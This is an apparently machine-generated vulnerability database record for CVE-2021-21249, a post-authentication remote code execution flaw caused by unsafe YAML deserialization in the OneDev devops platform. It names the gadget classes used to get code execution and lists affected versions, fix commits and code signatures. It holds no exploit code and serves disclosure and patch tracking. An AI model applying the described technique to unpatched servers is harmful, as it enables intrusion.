{"id":"CVE-2021-21249","details":"OneDev is an all-in-one devops platform. In OneDev before version 4.0.3, there is an issue involving YAML parsing which can lead to post-auth remote code execution. In order to parse and process YAML files, OneDev uses SnakeYaml which by default (when not using `SafeConstructor`) allows the instantiation of arbitrary classes. We can leverage that to run arbitrary code by instantiating classes such as `javax.script.ScriptEngineManager` and using `URLClassLoader` to load the script engine provider, resulting in the instantiation of a user controlled class. For a full example refer to the referenced GHSA. This issue was addressed in 4.0.3 by only allowing certain known classes to be deserialized","modified":"2026-04-11T23:33:58.070569Z","published":"2021-01-15T21:15:13.740Z","related":["GHSA-7xhq-m2q9-6hpm"],"references":[{"type":"ADVISORY","url":"https://github.com/theonedev/onedev/security/advisories/GHSA-7xhq-m2q9-6hpm"},{"type":"FIX","url":"https://github.com/theonedev/onedev/commit/d6fc4212b1ac1e9bbe3ce444e95f9af1e3ab8b66"}],"affected":[{"ranges":[{"type":"GIT","repo":"https://github.com/theonedev/onedev","events":[{"introduced":"0"},{"fixed":"4bd71941974a1b077e955616d7ba3da6fd21670c"},{"fixed":"d6fc4212b1ac1e9bbe3ce444e95f9af1e3ab8b66"}],"database_specific":{"versions":[{"introduced":"0"},{"fixed":"4.0.3"}]}}],"versions":["2.0-beta-build119","2.0-beta-build120","2.0.0","2.0.4","2.0.5","v3.0.10","v3.0.4","v3.0.5","v3.0.6","v3.0.7","v3.0.8","v3.0.9","v3.1.0","v3.1.1","v3.1.2","v3.2.0","v3.2.1","v3.2.2","v3.2.3","v3.2.4","v4.0.0","v4.0.1","v4.0.2"],"database_specific":{"source":"https://storage.googleapis.com/cve-osv-conversion/osv-output/CVE-2021-21249.json","vanir_signatures_modified":"2026-04-11T23:33:58Z","vanir_signatures":[{"deprecated":false,"id":"CVE-2021-21249-d63d10ab","signature_version":"v1","target":{"file":"server-core/src/main/java/io/onedev/server/migration/VersionedYamlDoc.java","function":"getClassForNode"},"source":"https://github.com/theonedev/onedev/commit/d6fc4212b1ac1e9bbe3ce444e95f9af1e3ab8b66","signature_type":"Function","digest":{"length":500,"function_hash":"138944583206282707346070210258658676956"}},{"deprecated":false,"id":"CVE-2021-21249-d73900f5","signature_version":"v1","target":{"file":"server-core/src/main/java/io/onedev/server/migration/VersionedYamlDoc.java"},"source":"https://github.com/theonedev/onedev/commit/d6fc4212b1ac1e9bbe3ce444e95f9af1e3ab8b66","signature_type":"Line","digest":{"line_hashes":["153436499289623100028202239715050662465","115915853865304753235450034654323715627","149632914228724985543702452543204993450","330258844865020736759466158536195826954","30218264420128282141813729023207895605","79651283559722281834227269170174588923","67481958638170210132757743742633319559","177208284667985434480464284118351237055","43278272975787269218273933739780939672","271213121722761727289629354854205157486","296650514969552683721211666856998863689","191761389872791266373999796391993127489","184077964517491301030697574414508083617","334561922508297416658027233167176069180","275292334856693783890696798175119787859","42642406356092669798683260078101992892","182645311013766548778767828261676683932","179136324979929876389588848816877331602","170797678454750527064507878027897809930","86981088040389283246458193821701913220","7185824316401942796779046560859009182"],"threshold":0.9}}]}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}]}